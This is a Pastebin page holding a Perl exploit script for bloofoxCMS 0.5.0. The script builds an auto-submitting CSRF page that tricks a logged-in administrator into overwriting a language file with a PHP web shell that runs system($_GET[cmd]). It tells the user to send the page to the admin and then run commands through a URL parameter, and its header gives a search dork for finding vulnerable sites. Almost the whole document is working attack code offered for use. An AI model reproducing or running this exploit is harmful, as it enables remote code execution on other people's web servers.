Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- ########################################################################
- # Title : bloofoxCMS V0.5.0 - Csrf inject php code
- # Author : AtT4CKxT3rR0r1ST
- # Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
- # Home : http://www.iphobos.com/blog/
- # Script : http://www.bloofox.com/download.21.html
- # Version : 0.5.0
- # Dork : "Powered by bloofoxCMS"
- # Vulnerability In Languages Editor
- # Note : Can Edit Any File Php In Script Just Change Value[Director/file]
- In Fileurl
- use LWP::UserAgent;
- use LWP::Simple;
- system("cls");
- print "|----------------------------------------------------|\n";
- print "| bloofoxCMS V0.5.0 - Csrf inject php code |\n";
- print "| Coded by : AtT4CKxT3rR0r1ST |\n";
- print "| GREATS TO MY LOVE |\n";
- print "|----------------------------------------------------|\n";
- sleep(2);
- print "\nInsert Target:";
- $h = <STDIN>;
- chomp $h;
- $html = '<html>
- <body onload="document.form0.submit();">
- <form method="POST" name="form0"
- action="'.$h.'/admin/index.php?mode=settings&page=editor">
- <input type="hidden" name="file" value=" <?php system($_GET[cmd]); ?> "
- <input type="hidden" name="fileurl" value="languages/deutsch.php"/>
- <input type="hidden" name="fileurl" value="../languages/deutsch.php"/>
- <input type="hidden" name="send" value="Save"/>
- </form>
- </body>
- </html>';
- sleep(1);
- print "Createing Done ...\n";
- open(XSS , '>>csrf.html');
- print XSS $html;
- close(XSS);
- print "Now Send csrf.html To Admin \n";
- sleep(1);
- print "To Exploit [http://site/languages/deutsch.php?cmd= COMMAND] \n";
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
